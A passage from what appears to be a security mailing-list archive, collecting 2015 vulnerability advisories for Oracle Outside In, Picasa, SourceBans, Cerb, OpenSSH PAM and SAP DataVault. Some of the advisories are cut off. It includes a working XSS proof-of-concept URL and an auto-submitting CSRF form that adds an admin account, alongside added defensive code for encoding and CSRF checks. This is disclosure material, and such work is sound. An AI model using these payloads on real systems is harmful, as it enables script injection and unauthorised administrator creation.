https://www.htbridge.com/advisory/HTB23266 - Cross-Site Request Forgery on 
Oxwall.
[2] Oxwall - http://www.oxwall.org/ - Oxwall® is unbelievably flexible and easy 
to use PHP/MySQL social networking software platform.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities

2015-10-26 Thread Secunia Research
==

 Secunia Research (now part of Flexera Software) 26/10/2015

   Oracle Outside In Two Buffer Overflow Vulnerabilities

==
Table of Contents

Affected Software..................1
Severity...........................2
Description of Vulnerabilities.....3
Solution...........................4
Time Table.........................5
Credits............................6
References.........................7
About Secunia......................8
Verification.......................9

==

1) Affected Software

* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.

== 
2) Severity

Rating: Moderately critical
Impact: System Access
Where:  From remote

== 
3) Description of Vulnerabilities

Secunia Research has discovered two vulnerabilities in Oracle Outside
In Technology, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise an application using the SDK.

1) An error in vstga.dll when processing TGA files can be exploited to
cause an out-of-bounds memory write.

2) An error in libxwd2.dll when processing XWD files can be exploited to
cause a stack-based buffer overflow.

Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.

== 
4) Solution

Apply update. Please see the Oracle Critical Patch Update Advisory
for October 2015 for details.

== 
5) Time Table

14/07/2015 - Vendor notified of vulnerabilities.
14/07/2015 - Vendor acknowledges report.
16/07/2015 - Vendor supplied bug ticket ID.
27/07/2015 - Vendor supplied information of fix in main codeline.
24/09/2015 - Replied to vendor and asked about CVE references.
25/09/2015 - Vendor replied that they would check our request.
27/09/2015 - Vendor assigned two CVE references.
17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.
20/10/2015 - Release of vendor patch.
21/10/2015 - Public disclosure.
26/10/2015 - Publication of research advisory.

==

6) Credits

Discovered by Behzad Najjarpour Jabbari, Secunia Research (now part
of Flexera Software).

==

7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2015-4877 and CVE-2015-4878 identifiers for the
vulnerabilities.

==

8) About Secunia (now part of Flexera Software)

In September 2015, Secunia was acquired by Flexera Software:

https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

==

9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2015-04/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Secunia Research: Google Picasa Phase One Tags Processing Integer Overflow Vulnerability

2015-10-26 Thread Secunia Research
==
 
  Secunia Research (now part of Flexera Software) 09/10/2015

Google Picasa Phase One Tags Processing Integer Overflow Vulnerability

==
Table of Contents

Affected Software..................1
Severity...........................2
Description of Vulnerability.......3
Solution...........................4
Time Table.........................5
Credits............................6
References.........................7
About Secunia......................8
Verification.......................9

==

1) Affected Software

* Google Picasa version 3.9.140 Build 239
* Google Picasa version 3.9.140 Build 248

NOTE: Other versions may also be affected.

==

2) Severity 

Rating: Highly critical
Impact: System Access
Where:  From remote
 
==

3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Google Picasa,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused by an integer overflow error when processing
data related to the Phase One 0x412 tag and can be exploited to cause a
heap-based buffer overflow.

Successful exploitation may allow execution of arbitrary code.

The vulnerability is confirmed in versions 3.9.140 Build 239 and
3.9.140 Build 248 running on Windows.

==

4) Solution 

The vendor has released a fix in version 3.9.140 Build 248, however,
the fix is ineffective. No official solution is currently available.
The vendor is currently planning to release a fix on 30th October,
2015.

==

5) Time Table 

04/08/2015 - Vendor notified of vulnerability.
04/08/2015 - Vendor acknowledges report.
10/08/2015 - Vendor requests PoC.
10/08/2015 - Provision of PoC.
19/08/2015 - Vendor acknowledges receipt.
08/09/2015 - Request of status update.
11/09/2015 - Vendor states fixed in code. ETA not yet available.
19/09/2015 - Vendor states update has been pushed.
25/09/2015 - Vendor notified of incomplete fix.
26/09/2015 - Vendor acknowledges receipt.
05/10/2015 - Request ETA of fix. Vendor notified that due to public
 availability of improper fix release an advisory
 release deadline on 09/10/2015 is established.
06/10/2015 - Vendor acknowledges and estimates 30/10/2015 release of
 fix.
06/10/2015 - Vendor notified that advisory deadline will still
 be applicable.
06/10/2015 - Vendor acknowledges and states to send notification once
 properly fixed.
09/10/2015 - Public disclosure of advisory.
12/10/2015 - Public disclosure of research advisory.

==

6) Credits 

Discovered by Hossein Lotfi, Secunia Research (now part of
Flexera Software).

==

7) References

Currently no CVE identifier is assigned.
 
==

8) About Secunia (now part of Flexera Software)

In September 2015, Secunia was acquired by Flexera Software:

https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

==

9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2015-03/

Complete list of vulnerability reports published

Reflected Cross-Site Scripting (XSS) in SourceBans

2015-10-05 Thread High-Tech Bridge Security Research
Advisory ID: HTB23273
Product: SourceBans
Vendor: Sourcebans team
Vulnerable Version(s): 1.4.11 and probably prior
Tested Version: 1.4.11
Advisory Publication:  October 2, 2015  [without technical details]
Vendor Notification: October 2, 2015 
Public Disclosure: October 23, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk Level: Medium 
CVSSv3 Base Score: 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in SourceBans 
which can be exploited to perform Cross-Site Scripting (XSS) attacks against 
web application users. 

The vulnerability exists due to insufficient filtering of input data passed 
via the "advSearch" HTTP GET parameter to the "/index.php" script when the "p" 
parameter is set to 'banlist'. A remote unauthenticated attacker can trick any 
user into opening a specially crafted link and execute arbitrary HTML and 
script code in the user's browser in the context of the vulnerable website. 

This vulnerability can be used in an advanced attack to compromise the web 
application and gain control over services within the local network. 

A simple exploit below will display a JS popup with the word "ImmuniWeb":

http://[host]/index.php?p=banlist&advSearch=0%27%22%3E%3Cimg+src=x+onerror=alert%28/ImmuniWeb/%29%3E=btype
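What the server actually receives from that link and why output encoding stops it, as an added example written for this page (not SourceBans code; the same encoding rule applies to the maintenance message in the Oxwall advisory). The assumption that the search term is reflected inside a quoted attribute of the search form is for illustration only; the advisory states just that the parameter is reflected without sufficient filtering. "[host]" is replaced by a placeholder host so the URL parses.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The advisory's proof-of-concept URL; "[host]" replaced by a placeholder host
# name only so that it parses.
POC_URL = ("http://host.invalid/index.php?p=banlist"
           "&advSearch=0%27%22%3E%3Cimg+src=x+onerror=alert%28/ImmuniWeb/%29%3E")

# Assumed reflection point: the search box of the ban list page.
TEMPLATE = '<input type="text" name="advSearch" value="%s">'


def adv_search_param(url: str) -> str:
    """Decode the advSearch GET parameter the way the PHP script receives it
    ('+' becomes a space, %XX sequences are decoded)."""
    return parse_qs(urlsplit(url).query)["advSearch"][0]


def render_vulnerable(adv_search: str) -> str:
    """Reflect the search term into the page without any encoding: the
    payload's leading quote closes the attribute, '>' closes the tag, and
    the <img onerror=...> that follows runs in every visitor's browser."""
    return TEMPLATE % adv_search


def render_fixed(adv_search: str) -> str:
    """html.escape() with quote=True (its default) encodes <, >, &, " and ',
    so the value can no longer terminate the attribute or open a new tag."""
    return TEMPLATE % html.escape(adv_search)


def tag_count(markup: str) -> int:
    """Number of tags that start in the markup; the template itself has one."""
    return markup.count("<")
```

Encoding must match the output context: html.escape() is right for element content and quoted attributes, but a value placed into a JavaScript string, a URL or an unquoted attribute needs the encoder for that context instead.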





---

References:

[1] High-Tech Bridge Advisory HTB23273 - 
https://www.htbridge.com/advisory/HTB23273 - Reflected Cross-Site Scripting 
(XSS) in SourceBans.
[2] SourceBans - http://www.sourcebans.net/ - When running SourceBans web 
interface and the SourceMod plugin together, you will be able to instantly ban 
people from all of the servers you have added into the system. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Cross-Site Request Forgery in Cerb

2015-09-02 Thread High-Tech Bridge Security Research
Advisory ID: HTB23269
Product: Cerb
Vendor: Webgroup Media LLC
Vulnerable Version(s): 7.0.3 and probably prior
Tested Version: 7.0.3
Advisory Publication:  August 12, 2015  [without technical details]
Vendor Notification: August 12, 2015 
Vendor Patch: August 14, 2015 
Public Disclosure: September 2, 2015 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-6545
Risk Level: Medium 
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a CSRF vulnerability in the 
Cerb platform, which can be exploited to perform Cross-Site Request Forgery 
attacks against administrators of the vulnerable web application in order to 
add administrative accounts to the system.  

The vulnerability exists due to the failure of the "/ajax.php" script to 
properly verify the source of incoming HTTP requests. Taking into consideration 
that Cerb is a business-critical application, this security flaw may be quite 
dangerous if exploited by malicious attackers.

A simple exploit below will add an admin user to the system when a logged-in 
victim opens a malicious page containing the exploit:

<form action="http://[host]/ajax.php" method="POST">
<!-- hidden <input> fields carrying the add-user parameters are missing from this copy of the advisory -->
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>


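The request-source check that "/ajax.php" here, Oxwall's "/admin/pages/maintenance" and Horde's "/admin/cmdshell.php", "/admin/sqlshell.php" and "/admin/phpshell.php" all lack, as an added example written for this page and not code from any of those projects. The origin "http://cerb.example", the request dictionaries, the cookie and form field names are constructed stand-ins for the auto-submitted forms shown in these advisories.

```python
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Constructed for this example: the application's own origin, standing in for
# http://[host] in the advisories.
SITE_ORIGIN = "http://cerb.example"


def new_csrf_token() -> str:
    """Per-session secret. The server stores it and embeds it in its own forms;
    a page on another origin cannot read it, so it cannot forge it."""
    return secrets.token_urlsafe(32)


def request_origin(headers: dict) -> Optional[str]:
    """Origin header if present, else scheme://host derived from the Referer."""
    if headers.get("Origin"):
        return headers["Origin"]
    if headers.get("Referer"):
        parts = urlsplit(headers["Referer"])
        return "%s://%s" % (parts.scheme, parts.netloc)
    return None


def csrf_check(request: dict, session_token: str) -> Tuple[bool, str]:
    """Decide whether a state-changing request may proceed.

    request = {"method": ..., "headers": {...}, "form": {...}}. Cookies are
    deliberately not consulted: the browser attaches them to the forged
    request as well, which is exactly why checking only the session is not
    enough.
    """
    if request.get("method", "GET").upper() != "POST":
        return False, "state change via non-POST rejected"
    origin = request_origin(request.get("headers", {}))
    if origin is None:
        return False, "no Origin or Referer: fail closed"
    if origin != SITE_ORIGIN:
        return False, "cross-site request from %s" % origin
    supplied = request.get("form", {}).get("csrf_token", "")
    # constant-time comparison; mismatched lengths simply compare unequal
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


SESSION_TOKEN = new_csrf_token()

# How the auto-submitted form from an attacker's page arrives at the server
# (constructed): the victim's session cookie rides along, but the Origin is
# the attacker's site and there is no token. Field names are illustrative.
FORGED_REQUEST = {
    "method": "POST",
    "headers": {"Origin": "http://attacker.example",
                "Cookie": "session=victim-admin-session"},
    "form": {"action": "add_user", "role": "admin"},
}

# The same action submitted from the application's own admin page.
LEGITIMATE_REQUEST = {
    "method": "POST",
    "headers": {"Origin": SITE_ORIGIN,
                "Cookie": "session=victim-admin-session"},
    "form": {"action": "add_user", "role": "admin", "csrf_token": SESSION_TOKEN},
}
```

Either layer alone defeats the form-based proofs of concept above; both together cover the cases where a browser or proxy strips Origin and Referer. Marking the session cookie SameSite=Lax adds a third, browser-enforced layer, and state changes must never be reachable via GET, or the check is bypassed with an image tag.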
---

Solution:

Update to Cerb 7.0.4

More Information:
https://github.com/wgm/cerb/commit/12de87ff9961a4f3ad2946c8f47dd0c260607144
http://wiki.cerbweb.com/7.0#7.0.4

---

References:

[1] High-Tech Bridge Advisory HTB23269 - 
https://www.htbridge.com/advisory/HTB23269 - Cross-Site Request Forgery in Cerb.
[2] Cerb - http://www.cerberusweb.com/ - Cerb is a fast and flexible platform 
for enterprise collaboration, productivity, and automation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



BFS-SA-2015-002: OpenSSH PAM Privilege Separation Vulnerabilities

2015-08-17 Thread Blue Frost Security Research Lab
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/   research(at)bluefrostsecurity.de
BFS-SA-2015-002   13-August-2015


Affected Product:   OpenSSH (http://www.openssh.com)
Affected Version:   Portable versions <= 6.9p1
Vulnerability:  Vulnerabilities in PAM Privilege Separation Code


I.   Impact

Two vulnerabilities were identified in the PAM privilege separation code. One
of them (III) allows remote attackers who have previously achieved remote code
execution within the unprivileged pre-auth sandbox process to perform a
successful authentication as an arbitrary user (e.g. root) and thus impersonate
other users. The only additional prerequisite is any valid (possibly
low-privileged) user account which can be used to log in to the system via SSH.



II.  Background

OpenSSH implements privilege separation, a generic approach which splits the
daemon into two processes: an unprivileged child process and a privileged
monitor process. (Privilege separation has been part of OpenSSH since 2002;
version 5.9 added the optional sandbox that further confines the
pre-authentication child.) The unprivileged child does most of the work and in
particular processes all the network data. The monitor process communicates
with the unprivileged child process and performs all the operations which
require higher privileges. The idea of this design is to prevent programming
errors in the unprivileged part from compromising the whole application and
thus to prevent a full system compromise. A good technical overview can be
found in the paper "Preventing Privilege Escalation" by Niels Provos et al.
(http://www.peter.honeyman.org/u/provos/papers/privsep.pdf).

The unprivileged child process and privileged monitor process communicate via
a socketpair. Several different monitor request and answer types are defined
which can be used to exchange messages between the two processes. The complete
list can be found in the mon_dispatch_proto{15,20} and
mon_dispatch_postauth{15,20} structures defined in monitor.c.

Monitor requests have certain flags assigned which restrict when and how
requests are accepted by the monitor. For example, the MON_ONCE flag means that
a request can only be sent once: it is disabled after the monitor has received
it for the first time. The MON_AUTH flag marks a request as related to the
authentication process. The complete list of flags can be found in the
monitor.c file as well.

Not all defined requests are permitted in every state of the SSH protocol. To
control which requests are permitted, the functions monitor_permit() and
monitor_permit_authentications() are used. monitor_permit() enables or disables
a single message type, while monitor_permit_authentications() enables or
disables all authentication-related messages, i.e. those with the MON_AUTH flag
set. When the monitor receives a request that is currently not permitted, the
monitor process terminates by calling the fatal() function.
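The permission mechanics just described, as an added model written for this page and not OpenSSH code: a permit bit that monitor_permit() and monitor_permit_authentications() set or clear, MON_ONCE retiring a request after its first use, and fatal() on anything not permitted. The flag values are those defined in monitor.c; the request handlers are stand-ins, and the order in which the real sshd opens requests during pre-authentication is simplified to the two steps the text above mentions.

```python
# Flag values as defined in OpenSSH's monitor.c (portable 6.9p1). Everything
# else below is a model written for this example, not OpenSSH code.
MON_ISAUTH     = 0x0004   # required for authentication
MON_AUTHDECIDE = 0x0008   # decides authentication
MON_ONCE       = 0x0010   # disable after calling
MON_AUTH       = MON_ISAUTH | MON_AUTHDECIDE
MON_PERMIT     = 0x1000   # request is currently permitted


class MonitorFatal(Exception):
    """Stands in for fatal(): the monitor process terminates."""


class Entry:
    def __init__(self, name, flags, handler):
        self.name, self.flags, self.handler = name, flags, handler


class Monitor:
    def __init__(self):
        self.dispatch = {}

    def add(self, name, flags, handler):
        self.dispatch[name] = Entry(name, flags, handler)

    def permit(self, name, allow):
        """monitor_permit(): switch a single request type on or off."""
        ent = self.dispatch[name]
        ent.flags = ent.flags | MON_PERMIT if allow else ent.flags & ~MON_PERMIT

    def permit_authentications(self, allow):
        """monitor_permit_authentications(): switch every MON_AUTH request."""
        for ent in self.dispatch.values():
            if ent.flags & MON_AUTH:
                self.permit(ent.name, allow)

    def read(self, name, payload=None):
        """monitor_read(): refuse unpermitted requests, retire MON_ONCE ones
        after this use, then dispatch to the handler."""
        ent = self.dispatch[name]
        if not ent.flags & MON_PERMIT:
            raise MonitorFatal("unpermitted request %s" % name)
        if ent.flags & MON_ONCE:
            ent.flags &= ~MON_PERMIT
        return ent.handler(payload)


def preauth_monitor() -> Monitor:
    """A monitor holding the PAM subset of the dispatch table quoted in
    section III plus MONITOR_REQ_PWNAM, in its pre-authentication state."""
    mon = Monitor()

    def pwnam_allow(user):
        # Model of mm_answer_pwnamallow(): once the user is known, PAM may start.
        mon.permit("MONITOR_REQ_PAM_START", True)
        return {"user": user, "valid": True}

    for name, flags, handler in [
        ("MONITOR_REQ_PWNAM",        MON_ONCE,                  pwnam_allow),
        ("MONITOR_REQ_PAM_START",    MON_ONCE,                  lambda _: "pam_start"),
        ("MONITOR_REQ_PAM_ACCOUNT",  0,                         lambda _: "pam_account"),
        ("MONITOR_REQ_PAM_INIT_CTX", MON_ISAUTH,                lambda _: "init_ctx"),
        ("MONITOR_REQ_PAM_QUERY",    MON_ISAUTH,                lambda _: "query"),
        ("MONITOR_REQ_PAM_RESPOND",  MON_ISAUTH,                lambda _: "respond"),
        ("MONITOR_REQ_PAM_FREE_CTX", MON_ONCE | MON_AUTHDECIDE, lambda _: "free_ctx"),
    ]:
        mon.add(name, flags, handler)
    mon.permit("MONITOR_REQ_PWNAM", True)   # the child may look the user up first
    return mon


def attempt(mon: Monitor, name: str, payload=None):
    """Send one request; the handler result, or 'fatal' if the monitor died."""
    try:
        return mon.read(name, payload)
    except MonitorFatal:
        return "fatal"
```

Walking through it: PAM_INIT_CTX is refused until permit_authentications(True) has run, PWNAM and PAM_FREE_CTX are accepted exactly once, and after permit_authentications(False) (what the monitor does once a user has authenticated) every MON_AUTH request is refused again. The attack surface the advisory is about lies in what the permitted handlers do with attacker-controlled payloads, not in this gate.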



III. PAM Authentication Bypass in Privilege Separation

When PAM support is enabled in the portable version of OpenSSH, a few additional
monitor requests are enabled which can be found in the monitor.c file:

#ifdef USE_PAM
{MONITOR_REQ_PAM_START, MON_ONCE, mm_answer_pam_start},
{MONITOR_REQ_PAM_ACCOUNT, 0, mm_answer_pam_account},
{MONITOR_REQ_PAM_INIT_CTX, MON_ISAUTH, mm_answer_pam_init_ctx},
{MONITOR_REQ_PAM_QUERY, MON_ISAUTH, mm_answer_pam_query},
{MONITOR_REQ_PAM_RESPOND, MON_ISAUTH, mm_answer_pam_respond},
{MONITOR_REQ_PAM_FREE_CTX, MON_ONCE|MON_AUTHDECIDE, mm_answer_pam_free_ctx},
#endif

Before any PAM-related monitor requests are sent, the unprivileged child process
sends the MONITOR_REQ_PWNAM request to verify that the username received from
the network represents a valid user. The monitor responds with the corresponding
passwd struct entry if the user exists and additionally caches the username
and passwd struct entry in the current monitor authentication context
(struct Authctxt *authctxt).

PAM authentication then starts with the unprivileged child process sending the
MONITOR_REQ_PAM_START request which tells the monitor to open a new
authentication transaction for the current user by calling the PAM API function
pam_start().

The next PAM-related monitor request sent by the child process is
MONITOR_REQ_PAM_INIT_CTX which initializes [2] the current PAM authentication
context in the monitor.

int
mm_answer_pam_init_ctx(int sock, Buffer *m)
{

debug3("%s", __func__);
authctxt->user = buffer_get_string(m, NULL);        [1]
sshpam_ctxt = (sshpam_device.init_ctx)(authctxt);   [2]

[Onapsis Security Advisory 2015-012] SAP Mobile Platform DataVault Predictable Encryption Password for Secure Storage

2015-08-12 Thread Onapsis Research Labs


Onapsis Security Advisory 2015-012: SAP Mobile Platform DataVault
Predictable Encryption Password for Secure Storage


1. Impact on Business
---

By exploiting this vulnerability, an attacker with access to a vulnerable
mobile device would be able to read sensitive information stored on the
device, including encrypted login credentials, and could potentially use
them to connect to business applications and access or modify business
information.

Risk Level: High

2. Advisory Information
---

* Public Release Date: 2015-08-12
* Subscriber Notification Date: 2015-08-12
* Last Revised: 2015-08-12
* Security Advisory ID: ONAPSIS-2015-012
* Onapsis SVS ID: ONAPSIS-00149
* CVE: Not Assigned
* Researcher: Fernando Russ
* Initial Base CVSS v2:  4.7 (AV:L/AC:M/Au:N/C:C/I:N/A:N)


3. Vulnerability Information
---

* Vendor:  SAP AG
* Affected Components:
  * SAP Mobile Platform 3.0 SP05 ClientHub
* Vulnerability Class: Use of Hard-coded Cryptographic Key (CWE-321)
* Remotely Exploitable: No
* Locally Exploitable: Yes
* Authentication Required: No
* Original Advisory:
http://www.onapsis.com/research/security-advisories/

4. Affected Components Description
---

The SAP Mobile Platform 3.0 SP5 has an API called DataVault, which is
used to securely store data on mobile devices. As described by SAP AG
[...] The DataVault APIs provide a secure way to persist and encrypt
data on the device. The data vault uses AES-256 symmetric encryption of
all its contents. The AES key is computed as a hash of the passcode
provided and a ‘salt’ value that can be supplied by the device
application developer, or automatically generated through the API [...]
 
5. Vulnerability Details
- 

The SAP DataVault has a special mechanism to generate a default set of
credentials if no password/salt is supplied during the creation of the
secure storage.

In this mode of operation the password/salt is derived from a
combination of fixed values and the VaultID belonging to the secure storage.


6. Solution
- ---

Implement SAP Security Note 2094830.


7. Report Timeline
* 11/07/2014: Onapsis provides vulnerability information to SAP AG.
* 11/08/2014: SAP AG confirms having received the information.
* 04/08/2015: SAP AG releases SAP security note 2094830 fixing the
vulnerability.
* 08/12/2015: Security Advisory is released.



About Onapsis Research Labs
- ---

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (GNU/Linux)
Comment: Onapsis Research Team

iEYEARECAAYFAlXLXZ8ACgkQz3i6WNVBcDXUkACeKV+76wa7IHncrIHFu9GhtJgu
9kYAoLOQN6rGuTkqA4s/ReBA/Uggt6bC
=hiVs
-END PGP SIGNATURE-



[Onapsis Security Advisory 2015-010] SAP Mobile Platform DataVault Keystream Recovery

2015-08-12 Thread Onapsis Research Labs

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory 2015-010: SAP Mobile Platform DataVault
Keystream Recovery


1. Impact on Business
- -

By exploiting this vulnerability an attacker with access to a vulnerable
mobile device would be able to decrypt credentials and other sensitive
information stored in it, potentially being able to connect to other
business systems.

Risk Level: High


2. Advisory Information
- ---

* Public Release Date: 2015-08-12
* Subscriber Notification Date: 2015-08-12
* Last Revised: 2015-08-12
* Security Advisory ID: ONAPSIS-2015-010
* Onapsis SVS ID: ONAPSIS-00149
* CVE: Not Assigned
* Researcher: Fernando Russ
* Initial Base CVSS v2:  5.4 (AV:L/AC:M/Au:N/C:C/I:P/A:N)


3. Vulnerability Information
- 

* Vendor:  SAP AG
* Affected Components:
   * SAP Mobile Platform 3.0 SP05 ClientHub

* Vulnerability Class: Missing Required Cryptographic Step (CWE-325)
* Remotely Exploitable: No
* Locally Exploitable: Yes
* Authentication Required: No
* Original Advisory:
https://www.onapsis.com/research/security-advisories/SAP-Mobile-Platform-DataVault-Keystream-Recovery


4. Affected Components Description
- --

The SAP Mobile Platform 3.0 SP5 has an API called DataVault, which is
used to securely store data on mobile devices. As described by SAP AG
[...] The DataVault APIs provide a secure way to persist and encrypt
data on the device. The data vault uses AES-256 symmetric encryption of
all its contents. The AES key is computed as a hash of the passcode
provided and a ‘salt’ value that can be supplied by the device
application developer, or automatically generated through the API [...]


5. Vulnerability Details
- 

Due to an incorrect implementation of the cryptographic algorithms and
parameters, it is possible to recover the keystream for the encrypted
data. As a result, it is possible to recover part of the plaintext
corresponding to an encrypted piece of data, thus reverting the
encryption process of some values inside the DataVault without needing
the original secret key.

Furthermore, due to the lack of cryptographic integrity mechanisms in
the SAP DataVault, an attacker recovering this keystream has the
possibility of re-encrypting (or, in practical terms, modifying), with
some limitations, some values previously encrypted inside the DataVault.


6. Solution
- ---

Implement SAP Security Note 2094830.


7. Report Timeline
- --

* 11/07/2014: Onapsis provides vulnerability information to SAP AG.
* 11/08/2014: SAP AG confirms having received the information.
* 04/08/2015: SAP AG releases SAP security note fixing the vulnerability
* 08/12/2015: Security Advisory is released.


About Onapsis Research Labs
- ---

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (GNU/Linux)
Comment: Onapsis Research Team

iEYEARECAAYFAlXLXUYACgkQz3i6WNVBcDU0lgCfbjB9R8+KN98m2z0lx0OkviFd
uaYAmwTpCAaK3YG2EoEWyMYIaVDjr7Hy
=SyWj
-END PGP SIGNATURE-



[Onapsis Security Advisory 2015-011] SAP Mobile Platform DataVault Predictable encryption passwords for Configuration Values

2015-08-12 Thread Onapsis Research Labs

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory 2015-011: SAP Mobile Platform DataVault
Predictable encryption passwords for Configuration Values


1. Impact on Business
- -

By exploiting this vulnerability an attacker with access to a vulnerable
mobile device would be able to decrypt and modify sensitive configuration
values used by SAP business applications.  

Risk Level: High

2. Advisory Information
- ---

* Public Release Date: 2015-08-12
* Subscriber Notification Date: 2015-08-12
* Last Revised: 2015-08-12
* Security Advisory ID: ONAPSIS-2015-0011
* Onapsis SVS ID: ONAPSIS-00149
* CVE: Not assigned
* Researcher: Fernando Russ
* Initial Base CVSS v2:  4.7 (AV:L/AC:M/Au:N/C:C/I:N/A:N)


3. Vulnerability Information
- 

* Vendor:  SAP AG
* Affected Components:   
  * SAP Mobile Platform 3.0 SP05 ClientHub
* Vulnerability Class: Use of Hard-coded Cryptographic Key (CWE-321)
* Remotely Exploitable: No
* Locally Exploitable: Yes
* Authentication Required: No
* Original Advisory:
https://www.onapsis.com/research/security-advisories/SAP-Mobile-Platform-Predictable-Encryption-Password-for-Configuration-Values


4. Affected Components Description
- --

The SAP Mobile Platform 3.0 SP5 has an API called DataVault, which is
used to securely store data on mobile devices. As described by SAP AG
[...] The DataVault APIs provide a secure way to persist and encrypt
data on the device. The data vault uses AES-256 symmetric encryption of
all its contents. The AES key is computed as a hash of the passcode
provided and a ‘salt’ value that can be supplied by the device
application developer, or automatically generated through the API [...]


5. Vulnerability Details
- 

The SAP DataVault uses a special password derived from well-known values
to encrypt some configuration values like the count of invalid attempts
to unlock a secure store.

This password is a composition of a value which is available in
plaintext form inside the secure store container, and a fixed value.
Also, the salt used is fixed. Both values are statically defined by the
SAP DataVault implementation, and depend neither on the installation
nor on the usage of the DataVault.


6. Solution
- ---

Implement SAP Security Note 2094830.


7. Report Timeline
- --

* 11/07/2014: Onapsis provides vulnerability information to SAP AG.
* 11/08/2014: SAP AG confirms having received the information.
* 04/08/2015: SAP AG releases SAP security note 2094830 fixing the
vulnerability.
* 08/12/2015: Security Advisory is released.


About Onapsis Research Labs
- ---

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
